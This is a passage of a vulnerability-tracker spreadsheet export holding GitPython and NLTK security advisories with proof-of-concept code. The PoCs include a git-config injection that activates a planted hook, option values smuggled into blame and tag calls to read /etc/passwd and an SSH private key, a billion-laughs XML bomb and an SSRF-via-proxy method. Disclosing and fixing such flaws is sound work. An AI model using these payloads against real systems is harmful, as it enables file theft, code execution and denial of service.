        os.makedirs(p, exist_ok=True)
    if os.path.exists(marker):
        os.remove(marker)

    subprocess.run(["git", "init", "-q", "-b", "main", repo_dir], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.name", "Test"], check=True)

    # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value
    # inside [core] (before any other section). No raw CR/LF/NUL byte is
    # written to disk here -- this is standard git config quoting +
    # backslash-line-continuation, decoded by both real git and GitConfigParser
    # into the Python string 'A\nhooksPath = ../evil-hooks'.
    cfg_path = os.path.join(repo_dir, ".git", "config")
    with open(cfg_path) as f:
        original = f.read()
    poisoned_entry = '\tzzz = "A\\nhooksPath = ../evil-hooks\\\n"\n'
    # Insert right after the [core] header line so it lives in the same section.
    new_config = original.replace("[core]\n", "[core]\n" + poisoned_entry, 1)
    with open(cfg_path, "w") as f:
        f.write(new_config)

    # Confirm it's inert per real git before touching GitPython.
    pre = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if pre.returncode == 0:
        print("SETUP ERROR: core.hookspath already set before GitPython touched anything")
        sys.exit(2)

    # Malicious hook: benign marker only.
    hook_path = os.path.join(hooks_dir, "pre-commit")
    with open(hook_path, "w") as f:
        f.write('#!/bin/sh\necho "PWNED-VIA-GITPYTHON-CONFIG-INJECTION" &gt; "%s"\nexit 0\n' % marker)
    os.chmod(hook_path, 0o755)

    import git  # gitpython under test

    repo = git.Repo(repo_dir)
    before = repo.config_reader().get_value("core", "zzz")
    print("core.zzz before any GitPython write =", repr(before))

    # ONE totally unrelated, benign write -- this is the only "attacker-adjacent"
    # action required, and it is something virtually every GitPython consumer
    # does routinely (setting an option, adding a remote, updating a branch's
    # tracking config, ...).
    with repo.config_writer() as cw:
        cw.set_value("user", "name", "Test User")

    post = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if post.returncode != 0:
        print("NOT VULNERABLE: core.hookspath still absent after the unrelated write")
        sys.exit(1)

    injected_path = post.stdout.strip()
    print("core.hookspath is now LIVE after one unrelated write:", injected_path)

    # Trigger the hook with a normal commit to prove it fires.
    with open(os.path.join(repo_dir, "file2.txt"), "w") as f:
        f.write("change\n")
    subprocess.run(["git", "-C", repo_dir, "add", "file2.txt"], check=True)
    subprocess.run(
        ["git", "-C", repo_dir, "-c", "user.email=t@example.com", "-c", "user.name=T",
         "commit", "-q", "-m", "trigger hook"],
        check=True,
    )

    if os.path.isfile(marker):
        with open(marker) as f:
            content = f.read().strip()
        print("VULNERABLE: hook fired, marker content =", content)
        sys.exit(0)
    else:
        print("NOT VULNERABLE: hook did not fire")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="1602"><c r="A1602" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1602" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D1602" s="5" t="inlineStr" /><c r="E1602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1602" s="5" t="inlineStr" /><c r="H1602" s="5" t="n"><v>0.004</v></c><c r="I1602" s="5" t="inlineStr" /><c r="J1602" s="5" t="inlineStr" /><c r="K1602" s="5" t="inlineStr" /><c r="L1602" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1602" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1602" s="5" t="inlineStr" /><c r="R1602" s="5" t="inlineStr" /><c r="S1602" s="5" t="inlineStr"><is><t>- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the "escapes intended base directory" sense)
- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).

`git clone` also accepts `--separate-git-dir=&lt;path&gt;`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: &lt;path&gt;`) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *"Redirects the repository metadata to a caller-controlled path"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:

```
:param allow_unsafe_options:
    Allow unsafe options to be used, such as ``--template`` and
    ``--separate-git-dir``.
```

i.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:

```python
unsafe_git_clone_options = [
    "--upload-pack",
    "-u",
    "--config",
    "-c",
    "--template",
    "--bundle-uri",
]
```

So any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.

## Root cause
Parity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same "denylist omits an equally-dangerous sibling option" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).

## Exploit path
1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `"separate-git-dir"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.
2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.
3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=&lt;attacker path&gt;` and GitPython executes `git clone -v --separate-git-dir=&lt;attacker path&gt; -- &lt;url&gt; &lt;dest&gt;` via `subprocess` (no shell).
4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.

## Impact
Arbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` ("Arbitrary Git Repository Creation Outside the Working Tree", CVSS 8.2). Concretely:
- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.
- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.
- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.

## Preconditions
- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.
- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.

## Evidence
- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `"--separate-git-dir"` with the comment "Redirects the repository metadata to a caller-controlled path".
- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `"--separate-git-dir"`.
- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.
- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.
- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.

## False-positive check (adversarial re-read)
- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).
- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.
- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.
- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.
- Verdict: no concrete blocker found. **CONFIRMED.**

## Remediation
Add `"--separate-git-dir"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.

## Confidence
High. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.


## Proof-of-Concept source (`gitpython-001-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in
unsafe_git_clone_options, so it reaches `git clone` unguarded and writes a
full git directory (config, hooks/, objects/, refs/, ...) to an
attacker-controlled path OUTSIDE the intended destination directory, with
allow_unsafe_options left at its default of False.

Run against the GitPython source tree under test, e.g.:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-001-poc.py &lt;workdir&gt;

Benign: only writes/reads inside the given workdir. No destructive/exfiltrating
payload. Exits non-zero and prints "NOT VULNERABLE" if the guard blocks the option
or the write does not escape the destination directory.
"""
import os
import sys
import subprocess


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-001-poc"
    src = os.path.join(workdir, "src")
    dest = os.path.join(workdir, "dest")
    sentinel_dir = os.path.join(workdir, "OUTSIDE_SENTINEL")
    target_gitdir = os.path.join(sentinel_dir, "redirected.git")

    for p in (src, dest, sentinel_dir):
        os.makedirs(p, exist_ok=True)

    # Minimal benign source repo to clone from.
    subprocess.run(["git", "init", "-q", "-b", "main", src], check=True)
    subprocess.run(["git", "-C", src, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", src, "config", "user.name", "Test"], check=True)
    with open(os.path.join(src, "file.txt"), "w") as f:
        f.write("hello\n")
    subprocess.run(["git", "-C", src, "add", "file.txt"], check=True)
    subprocess.run(["git", "-C", src, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test

    print("unsafe_git_clone_options =", git.Repo.unsafe_git_clone_options)
    assert "--separate-git-dir" not in git.Repo.unsafe_git_clone_options, (
        "guard now includes --separate-git-dir; PoC no longer applicable, target patched"
    )

    try:
        repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)
    except git.exc.UnsafeOptionError as e:
        print("NOT VULNERABLE: blocked by UnsafeOptionError:", e)
        sys.exit(1)

    wrote_outside = os.path.isdir(os.path.join(target_gitdir, "hooks")) and os.path.isfile(
        os.path.join(target_gitdir, "config")
    )
    gitlink_points_outside = False
    with open(os.path.join(dest, ".git")) as f:
        gitlink = f.read().strip()
        gitlink_points_outside = target_gitdir in gitlink

    print("repo.git_dir =", repo.git_dir)
    print("wrote git directory outside dest (sentinel) =", wrote_outside)
    print("dest/.git gitlink points outside dest =", gitlink_points_outside)

    if wrote_outside and gitlink_points_outside:
        print("VULNERABLE: git directory created at attacker-controlled path "
              f"outside the clone destination: {target_gitdir}")
        sys.exit(0)
    else:
        print("NOT VULNERABLE: sentinel not observed")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="1603"><c r="A1603" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1603" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D1603" s="5" t="inlineStr" /><c r="E1603" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1603" s="5" t="inlineStr" /><c r="H1603" s="5" t="n"><v>0.002</v></c><c r="I1603" s="5" t="inlineStr" /><c r="J1603" s="5" t="inlineStr" /><c r="K1603" s="5" t="inlineStr" /><c r="L1603" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1603" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1603" s="5" t="inlineStr" /><c r="R1603" s="5" t="inlineStr" /><c r="S1603" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="1604"><c r="A1604" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1604" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D1604" s="5" t="inlineStr" /><c r="E1604" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1604" s="5" t="inlineStr" /><c r="H1604" s="5" t="n"><v>0.002</v></c><c r="I1604" s="5" t="inlineStr" /><c r="J1604" s="5" t="inlineStr" /><c r="K1604" s="5" t="inlineStr" /><c r="L1604" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1604" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1604" s="5" t="inlineStr" /><c r="R1604" s="5" t="inlineStr" /><c r="S1604" s="5" t="inlineStr"><is><t>## Summary
`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).

## Root Cause
The fix `3af0c251` added `unsafe_git_tag_options = ["--file","-F"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference="--file=&lt;path&gt;"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.

## Impact
Arbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
from git import TagReference
t = TagReference.create(repo, "vpwn", reference="--file=/home/app/.ssh/id_rsa")
print(t.tag.message)   # contents of the file
```

## Attack Chain
1. Entry: app calls `TagReference.create(repo, name, reference=&lt;user&gt;)` with `reference="--file=/home/app/.ssh/id_rsa"`.
2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), ["--file","-F"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file="…"` IS blocked; only the positional escapes).
3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=&lt;secret&gt;']`.
4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).

## Bypass Evidence
Independently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=&lt;secret&gt;')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='&lt;secret&gt;')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).

## Affected Versions
`GitPython &lt;= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).

## Suggested Fix
Include the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="1605"><c r="A1605" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1605" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D1605" s="5" t="inlineStr" /><c r="E1605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1605" s="5" t="inlineStr" /><c r="H1605" s="5" t="n"><v>0.003</v></c><c r="I1605" s="5" t="inlineStr" /><c r="J1605" s="5" t="inlineStr" /><c r="K1605" s="5" t="inlineStr" /><c r="L1605" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1605" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1605" s="5" t="inlineStr" /><c r="R1605" s="5" t="inlineStr" /><c r="S1605" s="5" t="inlineStr"><is><t>Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `&lt;!ENTITY&gt;` declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (&lt;= 3.10.2):
- `nltk.chunk.named_entity.load_ace_file` — parses ACE annotation XML
- `nltk.internals.ElementWrapper` — converts any given string to an Element
- `nltk.downloader` — `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.

---

## Attack demonstration

Reproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.

### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

| levels | input bytes | expanded bytes | factor |
|--------|-------------|----------------|--------|
| 3 | 218 | 10,000 | x45 |
| 4 | 274 | 100,000 | x364 |
| 5 | 330 | 1,000,000 | x3,030 |
| 6 | 386 | (libexpat 2.7.1 cap trips) | - |

The level-6 cap is **libexpat's**, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

```python
import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'&lt;!ENTITY e{i} "{("&amp;e%d;"%(i-1))*10}"&gt;' for i in range(1, levels+1))
    return f'&lt;!DOCTYPE d [&lt;!ENTITY e0 "AAAAAAAAAA"&gt;{d}]&gt;&lt;d&gt;&amp;e{levels};&lt;/d&gt;'
ET.fromstring(bomb(5))   # -&gt; element whose .text is 1,000,000 chars
```

### 2. The patched entry point rejects it

```
&gt;&gt;&gt; from nltk.internals import ElementWrapper
&gt;&gt;&gt; ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)
```

### 3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy `&lt;!DOCTYPE&gt;` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

```python
evil = '&lt;!-- &lt;!DOCTYPE x [ ] &gt; --&gt;&lt;!DOCTYPE d [&lt;!ENTITY a "PPPP..."&gt;]&gt;&lt;d&gt;&amp;a;&lt;/d&gt;'
```

```
raw ElementTree -&gt; EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -&gt; REJECTED (EntitiesForbidden)
```

An earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.

### 4. Both back ends block it

`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:

```
stdlib fallback | billion-laughs               -&gt; REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -&gt; REJECTED (EntitiesForbidden)
```

Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).</t></is></c><c r="T1605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="1606"><c r="A1606" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1606" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D1606" s="5" t="inlineStr" /><c r="E1606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1606" s="5" t="inlineStr" /><c r="H1606" s="5" t="n"><v>0.003</v></c><c r="I1606" s="5" t="inlineStr" /><c r="J1606" s="5" t="inlineStr" /><c r="K1606" s="5" t="inlineStr" /><c r="L1606" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1606" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1606" s="5" t="inlineStr" /><c r="R1606" s="5" t="inlineStr" /><c r="S1606" s="5" t="inlineStr"><is><t>### Summary

Current NLTK source reopens SSRF in proxied environments. `pathsec.urlopen()` validates the requested hostname locally, but once proxy inheritance is enabled the real fetch is performed by the proxy rather than by the validated direct-connect socket path.

### Details

- **Vulnerability type:** Server-side request forgery
- **Affected component:** `nltk.pathsec.urlopen`, `nltk.data.load`, `nltk.downloader.Downloader.index`, `nltk.downloader.Downloader.download`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was a negative control and did not reproduce.
- **Patched versions:** Not yet patched
- **Root cause:** Proxy-handler inheritance disables `_SafeHTTPHandler` and `_SafeHTTPSHandler`, so the validated hostname no longer matches the actual egress destination.

The hardened direct path pins the validated numeric destination IP before opening the socket. The proxied branch instead copies `ProxyHandler` instances from the global opener, marks the request as proxied, and skips the pinned handlers. I confirmed that a validated public URL can be fetched from a loopback-only internal service through the proxy path via `pathsec.urlopen()`, `nltk.data.load()`, `Downloader.index()`, and `Downloader.download()`.

### PoC

**Preconditions**
- The runtime has an HTTP proxy configured and the caller relies on `pathsec` to keep network fetches SSRF-safe.

**Steps**
1. Start a loopback-only HTTP server that serves secret text, a valid downloader index, and a ZIP payload.
2. Configure a proxy that forwards a validated public URL to that internal loopback service.
3. Call `pathsec.urlopen()` or `nltk.data.load()` on the public URL and observe the internal response is returned.
4. Instantiate `Downloader(server_index_url=...)`, call `index()` and `download()`, and observe internal-only content is parsed and installed.

**Minimal reproducible excerpt**

```text
{'urlopen': 'PROXY_TEXT_SECRET', 'data_load': 'PROXY_TEXT_SECRET', 'downloaded_file': 'INTERNAL_ZIP_SECRET'}
```

### Impact

Consumers that trust `pathsec` as an SSRF barrier in proxied environments can be made to read internal-only HTTP resources, load forged downloader indexes, and install attacker-chosen package content fetched from the proxy's network view.

### Remediation

